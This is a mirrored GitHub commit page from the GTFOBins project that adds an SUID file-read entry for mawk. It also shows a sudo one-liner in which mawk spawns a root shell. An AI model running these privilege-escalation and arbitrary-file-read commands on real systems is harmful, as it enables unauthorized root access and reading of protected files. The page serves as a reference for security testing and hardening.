mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 14:30:07 +01:00
Add SUID category to mawk as file read
This commit is contained in:
parent
31b69cfeed
commit
c293ed20f7
@ -10,6 +10,10 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
mawk '//' "$LFILE"
|
mawk '//' "$LFILE"
|
||||||
|
suid:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
./mawk '//' "$LFILE"
|
||||||
sudo:
|
sudo:
|
||||||
- code: sudo mawk 'BEGIN {system("/bin/sh")}'
|
- code: sudo mawk 'BEGIN {system("/bin/sh")}'
|
||||||
limited-suid:
|
limited-suid:
|
||||||
|
Loading…
Reference in New Issue
Block a user